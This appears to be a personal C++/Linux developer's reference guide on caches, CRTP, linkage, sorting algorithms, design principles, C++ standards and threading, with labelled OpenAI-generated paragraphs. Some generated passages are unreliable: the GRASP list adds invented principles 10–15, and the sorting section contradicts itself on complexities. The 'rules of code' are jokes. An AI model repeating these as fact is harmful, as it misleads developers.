Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Fri Feb 14 23:04:37 UTC 2025

Foreword

An ode to C++

Let’s start with a haiku written by a computer.

Code runs swiftly
Syntax rules guide the way
C++, a language of power

This reference is a distillation of 15+ years of online logbook notes down to just the essentials that remain relevant to a senior software developer today. Just for fun – and where the topic is readily available or established – I have asked OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order vary each night. Hopefully this keeps repeat visits interesting and also prevents me from focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.


Caches

A cache is a small amount of unusually fast memory.

A modern multi-core machine will have a multi-level cache hierarchy, where the faster and smaller caches belong to individual processors. When one processor modifies a value in its cache, other processors cannot use the old value any more; and that memory location will be invalidated in all of the caches. Furthermore, since caches operate on the granularity of cache lines and not individual bytes, the entire cache line will be invalidated in all caches.

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order.

OpenAI: Processor caches refer to small, high-speed memory units located on the processor chip that store frequently accessed data and instructions. These caches improve the performance of the processor by reducing the time taken to access data from the main memory.

There are typically three levels of processor caches:

  1. Level 1 (L1) cache: This is the smallest and fastest cache, located on the processor itself. It is divided into two parts - the instruction cache, which stores frequently used instructions, and the data cache, which stores frequently used data. The size of L1 cache ranges from 8KB to 64KB.

  2. Level 2 (L2) cache: This is a larger cache, located on the processor chip or on a separate chip next to it. It is used to store data and instructions that are not found in the L1 cache. The size of L2 cache ranges from 256KB to 4MB.

  3. Level 3 (L3) cache: This is the largest and slowest cache, typically shared by all cores on the processor die (on older systems it sat on the motherboard). It is used to store data and instructions that are not found in the L1 and L2 caches. The size of L3 cache can range from 4MB to 64MB.

The purpose of these caches is to reduce the time taken to access data from the main memory, which is much slower than the processor. When the processor needs to access data, it first checks the L1 cache; if the data is not found there, it checks the L2 cache and then the L3 cache. If the data is not found in any of the caches, it is retrieved from the main memory.

The use of processor caches greatly improves the performance of the processor, as it reduces the number of times the processor needs to access the main memory. This is especially beneficial for tasks that involve repetitive data access, such as gaming, video editing, and web browsing.

However, since the size of these caches is limited, they can only store a certain amount of data and instructions. This means that if the data or instructions needed by the processor are not found in any of the caches, the processor will have to access the main memory, resulting in a slower performance. Additionally, if the caches are not managed efficiently, it can lead to cache conflicts where different processes are trying to access the same cache at the same time, causing delays in data retrieval.

In summary, processor caches play a crucial role in improving the performance of the processor by reducing the time taken to access data from the main memory. They are an integral part of modern processors and their effectiveness is constantly being improved with advancements in technology.

Cache consistency

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order.

Cache coherence

OpenAI: Cache coherence refers to the synchronization of data between different cache memory locations and the main memory in a computer system. When multiple processors or cores share access to the same data, cache coherence ensures that all copies of the data are consistent and up-to-date.

In a multi-processor system, each processor has its own cache memory which stores frequently used data from the main memory. When one processor updates a data item in its cache, other processors that have a copy of that data need to be notified and update their copies as well. This ensures that all processors have the most recent version of the data.

Cache coherence protocols are used to manage this synchronization process. These protocols define rules and mechanisms for maintaining data consistency between caches, such as invalidating outdated copies and updating them with the latest data.

Without cache coherence, there is a risk of data inconsistency and errors in the system. For example, if one processor modifies a data item and another processor reads an outdated copy of that data, it can lead to incorrect results or system crashes.

Overall, cache coherence is essential for efficient and reliable data sharing in multi-processor systems, ensuring that all processors have access to consistent and up-to-date data.

MESI cache coherence protocol

Each cache line has a state – one of Modified, Exclusive, Shared or Invalid, hence MESI – plus a tag and the data itself.
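
A rough sketch of what that record might look like (the names and the 64-byte line size are illustrative, not from any real implementation):

#include <array>
#include <cstddef>
#include <cstdint>

// The four MESI states a cache line can be in.
enum class MesiState { Modified, Exclusive, Shared, Invalid };

// A cache line: coherence state, the tag identifying which block of
// memory it currently holds, and the data itself.
struct CacheLine {
    MesiState state = MesiState::Invalid;
    std::uint64_t tag = 0;
    std::array<std::byte, 64> data{};
};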

Snooping

See bus snooping.

Directory based coherence

Used for large CPUs. See wiki.

Write-back versus write-through

All Intel-compatible CPUs during the last one/two decades used a write-back strategy for caches (which presumes fetching a cache line first to allow partial writes). Of course that’s the theory, reality is slightly more complex than that.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

OpenAI: Cache misses occur when the processor needs to access data that is not currently stored in the cache memory. This means that the data needs to be retrieved from a lower level of memory, such as the main memory or the hard drive. This process is slower compared to accessing data from the cache memory, which is why cache misses can result in slower performance.

There are several kinds of cache misses; two common categories are compulsory and capacity misses.

  1. Compulsory cache misses occur when a program is first run and data is not yet stored in the cache. This is because the cache memory is empty and needs to be filled with data as it is accessed.

  2. Capacity cache misses occur when the cache memory is full and a new piece of data needs to be stored. In this case, the cache must first make room by evicting some existing data before it can store the new data. This process takes time and can result in slower performance.

Cache misses can also occur due to conflicts in the cache memory. This happens when multiple pieces of data are mapped to the same cache location, resulting in one piece of data overwriting another. This can be mitigated by using different cache mapping techniques, such as set-associative or fully associative mapping.

Overall, cache misses can significantly impact the performance of a system, especially in applications that require frequent access to large amounts of data. To reduce the number of cache misses, developers can optimize their code to make better use of the cache memory and ensure efficient data access.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

CRTP

The curiously recurring template pattern (CRTP) is an idiom in C++ in which a class X derives from a class template instantiation using X itself as template argument. More generally it is known as F-bound polymorphism, and it is a form of static polymorphism.

#include <iostream>

// Base class template using CRTP
template<typename Derived>
class Base {
public:
    void foo() {
        static_cast<Derived*>(this)->fooImpl();
    }
};

// Derived class using CRTP
class Derived : public Base<Derived> {
public:
    void fooImpl() {
        // Implementation of foo specific to Derived
        std::cout << "Hello from Derived!" << std::endl;
    }
};
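
A quick usage sketch: calling foo() through the derived type dispatches to fooImpl() at compile time, with no vtable lookup.

int main() {
    Derived d;
    d.foo(); // statically dispatched to Derived::fooImpl()
}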

Cache associativity

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.
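
As a minimal sketch (the function and the base-case threshold are my own, purely illustrative), a cache-oblivious matrix transpose keeps halving the larger dimension until the sub-block is small enough to be cache friendly, whatever the cache size happens to be:

#include <cstddef>
#include <vector>

// Out-of-place transpose of an n x n row-major matrix.
void transpose(const std::vector<double>& in, std::vector<double>& out,
               std::size_t n,
               std::size_t r0, std::size_t r1,
               std::size_t c0, std::size_t c1) {
    const std::size_t rows = r1 - r0;
    const std::size_t cols = c1 - c0;

    if (rows + cols <= 32) {
        // Base case: the block is small, so just copy element by element.
        for (std::size_t r = r0; r < r1; ++r)
            for (std::size_t c = c0; c < c1; ++c)
                out[c * n + r] = in[r * n + c];
    } else if (rows >= cols) {
        // Recurse on the larger dimension.
        transpose(in, out, n, r0, r0 + rows / 2, c0, c1);
        transpose(in, out, n, r0 + rows / 2, r1, c0, c1);
    } else {
        transpose(in, out, n, r0, r1, c0, c0 + cols / 2);
        transpose(in, out, n, r0, r1, c0 + cols / 2, c1);
    }
}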

Profiling

Data-oriented design

Design to get the most value out of every single cache line that is read. Split the data apart from the functions that operate on it, and organise it by access pattern.

Pipeline stall contributors

Cache locality

Cache locality refers to the principle of organizing data in a way that takes advantage of the hierarchy of computer memory systems, such as the cache, main memory, and secondary storage. This means that data that is frequently accessed or used together is stored in close proximity to each other in memory, making it faster to retrieve and process.

There are two main types of cache locality:

  1. Temporal locality: This refers to the principle that data that has been recently accessed is likely to be accessed again in the near future. This is because programs often have loops or repetitive operations that require the same data to be accessed multiple times.

  2. Spatial locality: This refers to the principle that data that is stored close together in memory is likely to be accessed together. This is because programs often access data in a sequential or contiguous manner.

By optimizing for cache locality, the computer can reduce the number of times it needs to retrieve data from slower memory systems, improving overall performance and efficiency. This is especially important in modern computer architectures where the gap between processor speed and memory speed continues to widen.
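
A classic illustration of spatial locality (the array size is arbitrary): traversing a row-major matrix row by row touches consecutive addresses – and therefore consecutive cache lines – whereas traversing it column by column jumps a whole row's worth of bytes on every access.

#include <cstddef>
#include <vector>

constexpr std::size_t N = 1024;

// Row-major traversal: consecutive elements share cache lines (fast).
long sum_row_major(const std::vector<int>& m) {
    long sum = 0;
    for (std::size_t row = 0; row < N; ++row)
        for (std::size_t col = 0; col < N; ++col)
            sum += m[row * N + col];
    return sum;
}

// Column-major traversal of the same data: each access is N ints away
// from the previous one, so most accesses miss the cache (slow).
long sum_col_major(const std::vector<int>& m) {
    long sum = 0;
    for (std::size_t col = 0; col < N; ++col)
        for (std::size_t row = 0; row < N; ++row)
            sum += m[row * N + col];
    return sum;
}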

Further watching

TLB: Translation lookaside buffer

The Translation Lookaside Buffer (TLB) is a hardware cache that is used in computer systems to improve the efficiency of virtual memory address translation. It is a small, high-speed cache that stores recently used virtual-to-physical address translations.

When a program references a memory location, the virtual memory address needs to be translated into a physical memory address by the operating system. This translation process involves looking up a page table or a similar data structure. Since this translation operation is performed frequently, it can introduce overhead and impact system performance.

The TLB acts as a cache for these translations, reducing the need for repeated lookups in the page table. It stores a subset of the most recently used translations, making it faster to access and retrieve the corresponding physical memory address.

TLBs can be shared between multiple cores or processors, or each core may have its own dedicated TLB.

OpenAI:

Translation lookaside buffer (TLB) is a hardware cache that stores the most recently accessed virtual-to-physical address translations. It is used in virtual memory systems to speed up the process of translating virtual addresses to physical addresses. The TLB holds a limited number of translations, typically a few hundred, and is used to reduce the time it takes to access memory. When a virtual address is accessed, the TLB is checked first to see if the translation is already present. If it is, the physical address is retrieved from the TLB and the translation process is expedited. This helps to improve the overall performance and efficiency of the system. However, if the translation is not present in the TLB, the system will have to access the page table, which can be a slower process. The TLB is constantly updated and managed by the operating system to ensure that the most frequently used translations are always available.

Memory fences

A memory fence (or barrier) is a programming language construct used to enforce an ordering constraint on memory operations issued by a thread of execution on a CPU. This typically means that operations issued prior to the fence are guaranteed to be performed before operations issued after the fence.

#include <atomic>
#include <string>

const int num_mailboxes = 32;
std::atomic<int> mailbox_receiver[num_mailboxes];
std::string mailbox_data[num_mailboxes];
 
// The writer threads update non-atomic shared data 
// and then update mailbox_receiver[i] as follows:
mailbox_data[i] = ...;
std::atomic_store_explicit(&mailbox_receiver[i], receiver_id, std::memory_order_release);
 
// Reader thread needs to check all mailbox[i], but only needs to sync with one.
for (int i = 0; i < num_mailboxes; ++i)
    if (std::atomic_load_explicit(&mailbox_receiver[i],
        std::memory_order_relaxed) == my_id)
    {
        // synchronize with just one writer
        std::atomic_thread_fence(std::memory_order_acquire);
        // guaranteed to observe everything done in the writer thread
        // before the atomic_store_explicit()
        do_work(mailbox_data[i]);
    }

See wiki and cppreference.

What pushes something out of the cache?

There are several factors that can push something out of the cache:

  1. Cache size limitations: Caches have a limited capacity, and if the cache becomes full, the least recently used (LRU) items are typically pushed out to make space for new entries.
  2. Cache eviction policies: Various cache eviction policies determine what gets pushed out when the cache is full. LRU (Least Recently Used) is one of the commonly used policies that evicts the oldest item that has not been accessed recently.
  3. Time-based expiration: Some caches may have a time-based expiration mechanism. If an item remains unused for a certain period of time, it can be automatically removed from the cache to make room for other data.
  4. Size-based eviction: In some cases, if the cache is designed to store items of a fixed size, new entries may replace older items when they exceed the cache’s size limit.
  5. Manual cache invalidation: Cache invalidation can be triggered manually by a programmer or system administrator. This is often done to ensure that the cache is up-to-date with the latest data, or to remove specific items from the cache.

Further reading


C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {
}

For large readonly types – i.e., larger than a pointer – pass by const reference. Also consider whether the type is trivially copyable: that is, whether copying it needs only a shallow copy or a deep copy.

void func(const big_type& p) {
}

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {
}

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {
}

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you want the members to be laid out in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};
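
For example, a few compile-time checks against the types above (exactly which traits you assert on depends on what you care about):

#include <type_traits>

static_assert(std::is_trivially_copyable_v<A>,
              "A is plain old data and can be copied byte by byte");
static_assert(!std::is_polymorphic_v<B>,
              "B has no vtable pointer complicating its layout");
static_assert(sizeof(A) == sizeof(int), "no unexpected padding in A");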

C++ linkage

Internal linkage in C++ refers to the visibility and accessibility of a variable or function within a single translation unit. A translation unit is a single source file along with all of its included header files. Variables and functions with internal linkage can only be accessed within the translation unit in which they are declared. This is achieved by using the static keyword in front of the variable or function declaration.

External linkage, on the other hand, refers to the visibility and accessibility of a variable or function across multiple translation units. Variables and functions with external linkage can be accessed from any translation unit as long as they are declared in one and defined in another. This is the default linkage for global variables and functions.

Variables and functions with external linkage can also be declared as extern in a translation unit in which they are used but not defined. This indicates to the compiler that the variable or function is defined in another translation unit and should be linked to during the compilation process. This allows for sharing of variables and functions between different parts of a program.

In summary, internal linkage restricts the visibility of a variable or function to a single translation unit, while external linkage allows for sharing of variables and functions between different translation units.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.

If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.
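
A minimal two-file sketch (the file and variable names are hypothetical):

// a.cpp
static int internal_count = 0; // internal linkage: only visible within a.cpp
int shared_count = 0;          // external linkage: visible to other translation units

// b.cpp
extern int shared_count;       // declared here, defined in a.cpp
void bump() { ++shared_count; }
// extern int internal_count;  // would fail to link: a.cpp's symbol is not exported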

Anonymous namespaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down: the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence

RADCTDM

Advantages

Disadvantages

When should you use waterfall methodology?

Agile

Stop doing the things that nobody wants

BDD

What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.

Resources

TDD

Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit


Algorithms

Jonathan Boccara’s CppCon talk “105 STL Algorithms in Less Than an Hour” is well worth a watch for a quick overview.

Sorting

Quicksort is the poster boy of sorting algorithms.

OpenAI: Quicksort is O(n log n) in the average and best case and O(n^2) in the worst case. This is because in the average and best case, the algorithm divides the input into two sublists of roughly equal size, with each iteration reducing the size of the sublists by half. This results in a logarithmic time complexity. However, in the worst case, the pivot chosen is consistently the smallest or largest element, resulting in unbalanced partitions and a time complexity of O(n^2), as each iteration only reduces the size of the sublist by 1.

Below is a Python implementation just for fun. But how is it implemented in C++?

def partition(arr, low, high):
    i = low - 1
    pivot = arr[high]

    for j in range(low, high):
        if arr[j] < pivot:
            i = i + 1
            arr[i], arr[j] = arr[j], arr[i]

    arr[i + 1], arr[high] = arr[high], arr[i + 1]
    return i + 1


def quickSort(arr, low, high):
    if low < high:
        pi = partition(arr, low, high)

        quickSort(arr, low, pi - 1)
        quickSort(arr, pi + 1, high)


arr = [10, 7, 8, 9, 1, 5]
n = len(arr)
quickSort(arr, 0, n - 1)
print("Sorted array is:")
for i in range(n):
    print(arr[i])

std::sort uses Introsort

Introsort is a sorting algorithm that combines the best features of quicksort, heapsort, and insertion sort. It is a hybrid algorithm that uses quicksort to partition the data and then switches to heapsort when the recursion depth exceeds a certain level. If the data set is small enough, it switches to insertion sort for faster sorting. This algorithm is designed to handle the worst-case scenario of quicksort, which is when the data is already sorted or nearly sorted.

The algorithm starts by choosing a pivot element, typically the first or last element in the list. Then, it partitions the data into two sublists, one with elements less than the pivot and one with elements greater than the pivot. This process is repeated recursively on each sublist until the sublists are small enough to be sorted using insertion sort.

However, to prevent the worst-case scenario of quicksort, the algorithm also checks the recursion depth and switches to heapsort when it exceeds a certain level. Heapsort guarantees a worst-case time complexity of O(n log n), which is better than quicksort’s worst-case time complexity of O(n^2).

Introsort has a time complexity of O(n log n) in the average and best cases, and O(n log n) in the worst case. It also has a space complexity of O(log n). This makes it a very efficient sorting algorithm for large data sets, especially when the data is mostly sorted or nearly sorted.

In summary, introsort is a hybrid sorting algorithm that combines the strengths of quicksort, heapsort, and insertion sort to efficiently sort large data sets with a guarantee of O(n log n) time complexity in all cases.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n log n). However, if it fails to allocate, it degrades to an O(n (log n)^2) algorithm.
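
At the call site this is all very simple. A quick sketch of std::sort and std::stable_sort (the Employee type is purely illustrative):

#include <algorithm>
#include <functional>
#include <string>
#include <vector>

struct Employee {
    std::string name;
    int department;
};

int main() {
    std::vector<int> v{10, 7, 8, 9, 1, 5};
    std::sort(v.begin(), v.end());                      // introsort, ascending
    std::sort(v.begin(), v.end(), std::greater<int>()); // descending

    // Stable sort preserves the relative order of equivalent elements:
    // employees within the same department keep their original order.
    std::vector<Employee> staff{{"Ann", 2}, {"Bob", 1}, {"Cat", 2}};
    std::stable_sort(staff.begin(), staff.end(),
                     [](const Employee& a, const Employee& b) {
                         return a.department < b.department;
                     });
}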

https://leanpub.com/cpp-algorithms-guide

Small array threshold

The threshold for switching to insertion sort varies for each compiler.

std::list

std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.
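
For example (a trivial sketch):

#include <functional>
#include <list>

int main() {
    std::list<int> l{10, 7, 8, 9, 1, 5};
    l.sort();                    // member function: stable, typically merge sort
    l.sort(std::greater<int>()); // or with a comparator
}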

Other sorting algorithms

Considerations for choosing an algorithm: the size of the input, and the type of input, e.g., partially sorted or random.

Sorting algorithms are used to organize a list of elements in a specific order. The performance of a sorting algorithm is usually measured by its time complexity and space complexity.

  1. Bubble Sort: Time complexity: O(n^2) Space complexity: O(1)

Bubble sort is a simple and intuitive sorting algorithm that works by repeatedly swapping adjacent elements if they are in the wrong order. It has a time complexity of O(n^2), which means that it takes quadratic time to sort a list of n elements. This means that as the size of the input increases, the time taken to sort the list increases significantly. However, it has a space complexity of O(1), which means that it does not use any additional memory other than the given list.

  2. Selection Sort: Time complexity: O(n^2) Space complexity: O(1)

Selection sort works by repeatedly finding the minimum element from the unsorted part of the list and placing it at the beginning. It has a time complexity of O(n^2), which is the same as bubble sort. However, it has a slightly better space complexity of O(1) as it does not require any additional memory other than the given list.

  3. Insertion Sort: Time complexity: O(n^2) Space complexity: O(1)

Insertion sort is similar to selection sort, but instead of finding the minimum element and placing it at the beginning, it finds the correct position for each element in the sorted part of the list and inserts it there. It also has a time complexity of O(n^2) and a space complexity of O(1).

  4. Merge Sort: Time complexity: O(nlogn) Space complexity: O(n)

Merge sort is a divide and conquer algorithm that splits the list into smaller sublists, sorts them, and then merges them back together. It has a time complexity of O(nlogn), which is significantly better than the previous sorting algorithms. However, it has a space complexity of O(n), as it requires additional memory to store the sublists during the sorting process.

  5. Quick Sort: Time complexity: O(nlogn) Space complexity: O(logn)

Quick sort is also a divide and conquer algorithm that works by selecting a pivot element and partitioning the list into two sublists, one with elements smaller than the pivot and one with elements larger than the pivot. It then recursively sorts the sublists. It has a time complexity of O(nlogn), which is the same as merge sort, but it has a space complexity of O(logn) as it uses a stack to keep track of the recursive calls.

  6. Heap Sort: Time complexity: O(nlogn) Space complexity: O(1)

Heap sort uses a heap data structure to sort the list. It first builds a heap from the list and then repeatedly removes the root element and places it at the end of the sorted part of the list. It has a time complexity of O(nlogn), which is the same as merge and quick sort, but it has a space complexity of O(1) as it sorts the list in place without requiring any additional memory.

In summary, the time complexity of these sorting algorithms ranges from O(nlogn) to O(n^2), with merge, quick, and heap sort having the best time complexity of O(nlogn). In terms of space complexity, bubble, selection, insertion, and heap sort have the best complexity of O(1), while merge sort has a space complexity of O(n) and quick sort has a space complexity of O(logn).

All of these are Θ(n log n) in all cases, apart from Timsort, which has an Ω(n) best case, and Quicksort, which has a terrible O(n^2) worst case (if we happen to always pick the worst pivot). Quicksort is a good all-rounder with an O(n log n) average case, but it does have an O(n^2) worst case. It is said this can be avoided by picking the pivot carefully, but an example can always be constructed where the chosen pivot is the worst case.

References

SOLID

  1. Single Responsibility Principle (SRP): A class should have only one responsibility or one reason to change.
  2. Open/Closed Principle (OCP): Software entities (classes, modules, functions, etc.) should be open for extension, but closed for modification.
  3. Liskov Substitution Principle (LSP): Subtypes should be substitutable for their base types without altering the correctness of the program.
  4. Interface Segregation Principle (ISP): Clients should not be forced to depend on interfaces they do not use, and classes should not implement unnecessary methods.
  5. Dependency Inversion Principle (DIP): High-level modules should not depend on low-level modules. Both should depend on abstractions. Abstractions should not depend on details; details should depend on abstractions.

GRASP

Less common but another set of principles to consider.

  1. Information Expert: Assign responsibility to the class or object with the most information needed to fulfill it.

  2. Creator: Assign the responsibility to create objects to the class that has the necessary information about the object’s creation.

  3. High Cohesion: Assign responsibility to a class or object that has a tightly focused and well-defined purpose.

  4. Low Coupling: Reduce inter-dependencies between classes by assigning responsibilities to classes with minimal connections to other classes.

  5. Controller: Assign the responsibility of handling input and coordinating actions to a separate controller class.

  6. Polymorphism: Use inheritance and interface implementation to enable polymorphic behavior, allowing different objects to respond differently to the same message.

  7. Indirection: Assign responsibility for handling a request to an intermediate object that can delegate the request to another object.

  8. Pure Fabrication: Create a class solely for the purpose of supporting other classes and objects.

  9. Protected Variations: Encapsulate the parts of the system that are likely to change, in order to protect other parts from being affected.

  10. Creator-Information Expert: Assign the responsibility of creating objects to the class that has the most information about the object being created.

  11. Low Coupling-Controller: Assign the responsibility of coordinating actions to a separate controller class with minimal dependencies.

  12. Polymorphism-Controller: Use polymorphism to enable different controllers to handle the same input in different ways.

  13. Pure Fabrication-Controller: Create a controller class solely for the purpose of handling input and coordinating actions.

  14. Controller-Protected Variations: Use a controller class to encapsulate variations in handling input and coordinating actions.

  15. Polymorphism-Pure Fabrication: Use polymorphism to enable pure fabrication classes to support different types of objects.


C++ standards

The big things for me are ranges and views: effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazily evaluated (and gcc 14 brings ranges::to<> to the party). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.

I’ve attempted to deep dive into templates a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported; it gives you the readability of “normal” code with the potential performance benefits of compile-time. And it also finds UB! However, you quickly hit the issue where something isn’t constexpr so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator seemed like a game changer but I’ve only used it once.

You’ll have to reach into gcc 14 but std::print is very welcome; as are modules (which might actually be available in 13.2 with the -fmodules-ts flag) but poorly supported and not quite what I’d like yet.

Notable mentions from C++17 are structured bindings and execution policy.

C++26

C++23

See the presentation by Marc Gregoire (CppCon 2022).

You’ve gotta track gcc head to avoid disappointment.

Ranges and views (part two)

A lot of effort has gone into ranges and views in C++23.

std::ranges

std::views

C++20

C++17

Also see cppreference.

C++14

C++14 is an extension and improvement of C++11.

C++11


The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code (makes testing easier)
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting: even better, don’t bother and let clang-format do it
  5. Make things constant: it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if it:

  1. Talks to the database
  2. Communicates across the network
  3. Touches the file system
  4. Can’t run at the same time as any of your other unit tests
  5. Requires you to do special things to your environment (such as editing config files) to run it

See the complete article.


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section  Description
stack    Local variables (grows downwards)
heap     Dynamic memory (grows upwards)
.rodata  Read-only data
.bss     Uninitialised data
.data    Initialised data
.text    Code

  1. Header: This segment contains information about the file, such as the file size, entry point, and architecture.

  2. Text/code: This segment contains the actual machine code that is executed by the processor. It includes instructions, function definitions, and data literals.

  3. Data: This segment contains initialized data such as global and static variables.

  4. BSS (Block Started by Symbol): This segment contains uninitialized data, usually declared as global or static variables.

  5. Stack: This segment contains the program’s execution stack, which is used for local variables, function parameters, and return addresses.

  6. Heap: This segment contains dynamically allocated memory, typically managed by the program’s memory management functions.

  7. Dynamic Linking: This segment contains information required for the program to link and load dynamic libraries at runtime.

  8. Relocation: This segment contains information about the addresses of symbols and how to relocate them when the program is loaded into memory.

  9. Debug: This segment contains debugging information, such as line numbers, symbols, and source code information, used for debugging and error handling.

  10. Resources: This segment contains additional resources such as icons, images, and strings used by the program.

  11. Export: This segment contains information about symbols that can be accessed by other programs.

  12. Import: This segment contains information about symbols that are required by the program and must be resolved at runtime by the operating system.
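
A small sketch of where typical C++ objects end up (section names as per the table above; the exact placement can vary by compiler, flags, and optimisation level):

const char* greeting = "hello"; // the string literal itself lives in .rodata
int initialised = 123;          // .data: initialised global
int uninitialised;              // .bss: zero-initialised global
static int counter;             // .bss, with internal linkage

int main() {                    // the machine code lives in .text
    int local = 1;              // stack
    int* dynamic = new int(7);  // heap
    int result = local + *dynamic + initialised + uninitialised + counter;
    delete dynamic;
    return result + (greeting != nullptr);
}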


The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc. – but most people won’t know what you’re talking about. Also, manufacturers tend to use powers of 1000 rather than powers of 1024 (e.g., 1000^3 rather than 2^30 for “giga”) because it makes their capacities look bigger.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

Hash functions

A hash function is a mathematical algorithm that takes in data of any size and produces a fixed-size output called a hash value or hash code. This output is typically a unique representation of the input data and is used to identify and compare data quickly. Hash functions are commonly used in cryptography, data storage, and data retrieval systems.

Properties of a hashing algorithm

String hashing
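
A quick sketch: the Standard Library provides std::hash, and FNV-1a is a simple, widely used non-cryptographic string hash (the constants below are the standard 64-bit FNV offset basis and prime).

#include <cstdint>
#include <functional>
#include <iostream>
#include <string>
#include <string_view>

// FNV-1a: XOR each byte into the hash, then multiply by a prime.
std::uint64_t fnv1a(std::string_view s) {
    std::uint64_t hash = 14695981039346656037ull; // FNV offset basis
    for (const unsigned char c : s) {
        hash ^= c;
        hash *= 1099511628211ull; // FNV prime
    }
    return hash;
}

int main() {
    const std::string s = "hello world";
    std::cout << std::hash<std::string>{}(s) << '\n'; // implementation defined
    std::cout << fnv1a(s) << '\n';                    // deterministic
}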


Resources


Multithreading

Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.

Reentrancy

A routine can be described as reentrant if it can be interrupted and not leave the operation partially complete: the invariants remain true.

Invariants

A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must hold mutually exclusive access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

OpenAI: Invariants refer to specific conditions or properties that remain constant or unchanged throughout a particular process, system, or situation. They are important concepts in mathematics, computer science, and engineering, as well as in other fields such as physics and economics.

Invariants are often used to describe the behavior of a system or process, and they can help identify and understand patterns and relationships between different variables. They can also be used to prove the correctness of algorithms and programs.

There are different types of invariants, including:

  1. Loop invariants: These are conditions that remain true before, during, and after each iteration of a loop in a computer program.

  2. Data invariants: These are properties or constraints that remain true for a particular data structure or object throughout its lifetime.

  3. Physical invariants: These are properties or quantities that remain constant in a physical system, such as energy or momentum.

  4. Logical invariants: These are constraints or relationships that remain unchanged in a logical system, such as a set of axioms or rules of inference.

